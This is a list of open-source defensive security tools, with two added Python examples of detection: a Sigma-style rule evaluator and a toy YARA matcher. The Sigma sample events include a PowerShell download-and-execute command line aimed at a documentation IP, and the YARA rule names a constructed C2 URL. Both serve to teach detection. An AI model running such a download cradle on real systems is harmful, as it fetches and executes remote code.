Security monitoring, intrusion detection/prevention
- Suricata – intrusion detection system
- Snort – intrusion detection system
- Zeek – network security monitoring
- OSSEC – host-based intrusion detection system
- Wazuh – a more active fork of OSSEC
- Velociraptor – endpoint visibility and response
- OSSIM – open source SIEM, at the core of AlienVault
- Security Onion – security monitoring and log management distribution (bundles Suricata, Zeek, Wazuh and the Elastic Stack)
- Elastic Security (formerly Elastic SIEM) – SIEM functionality built on the Elastic Stack
- MozDef – SIEM-like layer on top of Elasticsearch, originally from Mozilla (archived)
- Sagan – log analytics and correlation
- Apache Metron – (retired) network security monitoring, evolved from Cisco OpenSOC
- Arkime – packet capture and search tool (formerly Moloch)
- PRADS – passive real-time asset detection system
- BloodHound – Active Directory attack-path and relationship mapping
Threat intelligence
- MISP – threat intelligence platform
- SpiderFoot – OSINT automation and reconnaissance
- OpenCTI – threat intelligence platform
- OpenDXL – open source tools for security intelligence sharing
- Sigma – Generic Signature Format for SIEM Systems
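
The Sigma entry above names a format rather than a tool, so here is an added example of what a SIEM does with such a rule. This is not code from the Sigma project or from any tool listed on this page: real Sigma rules are YAML, and the rule below is the same structure written as a Python dict so it runs on the standard library alone. The rule, the event records and the addresses in them are constructed for illustration. The evaluator covers named selections (a map is an AND of fields, a list of maps is an OR), the contains / startswith / endswith / all modifiers, list values (any-of), and conditions built from and / or / not / parentheses; aggregation forms such as "1 of selection*" are deliberately unsupported and raise.

```python
"""Evaluate a Sigma-style detection rule over constructed log events.

Added illustration, not code from the Sigma project. The rule is a Python dict
with the same shape as a Sigma YAML document (hypothetical rule, constructed events).
"""
import re
from typing import Any

# Hypothetical rule modelled on Sigma's Windows process_creation rules.
RULE = {
    "title": "Suspicious PowerShell Download Cradle (constructed example)",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection": {
            "Image|endswith": ["\\powershell.exe", "\\pwsh.exe"],
            "CommandLine|contains|all": ["Net.WebClient", "DownloadString"],
        },
        "filter": {
            "ParentImage|endswith": "\\ConfigurationManager.exe",
        },
        "condition": "selection and not filter",
    },
    "level": "high",
}

# Constructed events (not real telemetry); 198.51.100.7 is a documentation address.
EVENTS = [
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -c IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://198.51.100.7/a.ps1')",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe"},
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -c IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://intranet/baseline.ps1')",
     "ParentImage": "C:\\Program Files\\SCCM\\ConfigurationManager.exe"},
    {"Image": "C:\\Windows\\System32\\notepad.exe",
     "CommandLine": "notepad.exe notes.txt",
     "ParentImage": "C:\\Windows\\explorer.exe"},
    {"Image": "C:\\Program Files\\PowerShell\\7\\pwsh.exe",
     "CommandLine": "pwsh -c Get-Process",
     "ParentImage": "C:\\Windows\\explorer.exe"},
]


def _match_value(actual: Any, expected: Any, mods: list) -> bool:
    # Sigma string matching is case-insensitive by default.
    a, e = str(actual).lower(), str(expected).lower()
    if "contains" in mods:
        return e in a
    if "startswith" in mods:
        return a.startswith(e)
    if "endswith" in mods:
        return a.endswith(e)
    return a == e


def _match_field(event: dict, key: str, expected: Any) -> bool:
    # "Field|mod1|mod2": the first component is the field, the rest are modifiers.
    field, *mods = key.split("|")
    if field not in event:
        return False
    values = expected if isinstance(expected, list) else [expected]
    hits = [_match_value(event[field], v, mods) for v in values]
    return all(hits) if "all" in mods else any(hits)   # a list is OR unless |all


def _match_selection(event: dict, selection: Any) -> bool:
    # A map is an AND of its fields; a list of maps is an OR of those maps.
    if isinstance(selection, list):
        return any(_match_selection(event, s) for s in selection)
    return all(_match_field(event, k, v) for k, v in selection.items())


def evaluate_condition(condition: str, truth: dict) -> bool:
    """Resolve selection names to booleans, then evaluate the boolean expression."""
    parts = []
    for tok in re.findall(r"\(|\)|[A-Za-z_][A-Za-z0-9_*]*", condition):
        if tok in ("and", "or", "not", "(", ")"):
            parts.append(tok)
        elif tok in truth:
            parts.append(str(truth[tok]))
        else:
            raise ValueError(f"unsupported condition token: {tok!r}")
    # Only True/False, and/or/not and parentheses can reach eval here.
    return bool(eval(" ".join(parts), {"__builtins__": {}}, {}))


def rule_matches(rule: dict, event: dict) -> bool:
    det = rule["detection"]
    truth = {name: _match_selection(event, sel)
             for name, sel in det.items() if name != "condition"}
    return evaluate_condition(det["condition"], truth)


def run_rule(rule: dict, events: list) -> list:
    """Return the indexes of the events the rule fires on."""
    return [i for i, ev in enumerate(events) if rule_matches(rule, ev)]


if __name__ == "__main__":
    for i in run_rule(RULE, EVENTS):
        print(f"[{RULE['level']}] {RULE['title']}: {EVENTS[i]['CommandLine']}")
```

Only the first event fires: the second carries the same download cradle but is excluded by the filter on its parent process, which is the usual shape of a Sigma rule (a broad selection narrowed by one or more filters). A real backend such as sigma-cli compiles the same structure into the target SIEM's query language instead of evaluating it in Python.
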
Incident response
- StackStorm – event-driven automation platform, usable as a SOAR
- CimSweep – agentless Windows incident response and hunting over CIM/WMI
- GRR – incident response and remote live forensics
- TheHive – incident response / SOAR platform
- Cortex – TheHive companion for analysing observables and running active responses
- Shuffle – open source SOAR platform
- osquery – real-time querying of endpoint data
- Kansa – PowerShell incident response
Vulnerability assessment
- OpenVAS – widely used vulnerability scanner, the scan engine of Greenbone Vulnerability Management (GVM)
- ZAP (Zed Attack Proxy) – web application scanner and intercepting proxy, started under OWASP
- WebScarab – (obsolete) web vulnerability scanner by OWASP
- w3af – web vulnerability scanner
- Loki – host IoC scanner (file hashes, filenames, YARA rules)
- cve-search – tools for importing CVE/CPE data into a local database and searching it
Firewall
- pfSense – widely deployed FreeBSD-based firewall/router distribution
- OPNsense – FreeBSD-based firewall, forked from pfSense
- Smoothwall – Linux-based Firewall
Antivirus / endpoint protection
- ClamAV – open source antivirus engine
- Armadito AV – open source antivirus (retired)
- YARA – the pattern-matching swiss army knife for malware researchers
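
YARA (and the Loki scanner in the vulnerability assessment section, which consumes YARA rules) matches byte patterns in file content rather than fields in log events. As an added example, the following simplified matcher shows what a YARA rule expresses: it is not the YARA engine or its Python bindings, and the rule, the documentation address in it and the sample buffers are all constructed. Supported here: text strings with an optional nocase flag, hex strings with ?? wildcards (compiled to a bytes regex), and a condition over string identifiers ("$x" for any match, "$x at <offset>" for a positional match) joined with and / or / not / parentheses.

```python
"""Minimal YARA-style matcher over an in-memory buffer.

Added illustration of the idea behind YARA rules; not the YARA engine.
The rule and the sample buffers are constructed for this example.
"""
import re

# Hypothetical rule in YARA's shape (strings + condition), written as a dict.
RULE = {
    "name": "Constructed_PE_Download_Stub",
    "strings": {
        "$mz":  {"hex": "4D 5A ?? ?? ?? ?? 00 00"},               # MZ header, two wildcard fields
        "$url": {"text": "http://198.51.100.7/", "nocase": True},  # constructed C2 URL
        "$api": {"text": "URLDownloadToFileA"},
    },
    "condition": "$mz at 0 and ($url or $api)",
}

# Constructed buffers, not real files: a fake PE header plus strings, plain text, and a clean header.
SAMPLE_PE = (b"MZ\x90\x00\x03\x00\x00\x00" + b"\x00" * 16
             + b"HTTP://198.51.100.7/payload.bin\x00" + b"URLDownloadToFileA\x00")
SAMPLE_TEXT = b"just a text file that mentions URLDownloadToFileA"
SAMPLE_PE_CLEAN = b"MZ\x90\x00\x03\x00\x00\x00" + b"\x00" * 32

TOKEN = r"\$\w+\s+at\s+\d+|\$\w+|and|or|not|\(|\)"


def compile_string(spec: dict) -> re.Pattern:
    """Turn one YARA-style string definition into a compiled bytes regex."""
    if "hex" in spec:
        parts = [b"." if tok == "??" else re.escape(bytes([int(tok, 16)]))
                 for tok in spec["hex"].split()]
        return re.compile(b"".join(parts), re.DOTALL)   # DOTALL so ?? also matches 0x0A
    flags = re.IGNORECASE if spec.get("nocase") else 0
    return re.compile(re.escape(spec["text"].encode()), flags)


def scan(rule: dict, data: bytes) -> dict:
    """Return {identifier: [match offsets]} for every string in the rule."""
    return {ident: [m.start() for m in compile_string(spec).finditer(data)]
            for ident, spec in rule["strings"].items()}


def evaluate_condition(condition: str, offsets: dict) -> bool:
    tokens = re.findall(TOKEN, condition)
    # Refuse conditions with syntax this toy does not understand (e.g. "#a > 2").
    if re.sub(r"\s+", "", "".join(tokens)) != re.sub(r"\s+", "", condition):
        raise ValueError("unsupported condition syntax")
    parts = []
    for tok in tokens:
        at = re.fullmatch(r"(\$\w+)\s+at\s+(\d+)", tok)
        if at:
            parts.append(str(int(at.group(2)) in offsets[at.group(1)]))
        elif tok.startswith("$"):
            parts.append(str(bool(offsets[tok])))
        else:
            parts.append(tok)
    # Only True/False, and/or/not and parentheses can reach eval here.
    return bool(eval(" ".join(parts), {"__builtins__": {}}, {}))


def rule_matches(rule: dict, data: bytes) -> bool:
    return evaluate_condition(rule["condition"], scan(rule, data))


if __name__ == "__main__":
    for label, buf in (("pe", SAMPLE_PE), ("text", SAMPLE_TEXT), ("pe_clean", SAMPLE_PE_CLEAN)):
        verdict = "MATCH" if rule_matches(RULE, buf) else "no match"
        print(f"{label:9s} {RULE['name']}: {verdict}")
```

The positional "$mz at 0" check is what keeps the plain-text buffer from matching even though it contains the API name, and the clean header fails because neither payload string is present. YARA itself adds much more (wide/ascii/xor modifiers, regexes, counts, file-size and PE module conditions), but the strings-plus-condition structure is the same.
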
Email security
- Hermes Secure Email Gateway – an Ubuntu-based email gateway
- Proxmox Mail Gateway – open source email gateway (anti-spam and anti-virus)
- MailScanner – email security system
- SpamAssassin – anti-spam platform
- OrangeAssassin – drop-in replacement for SpamAssassin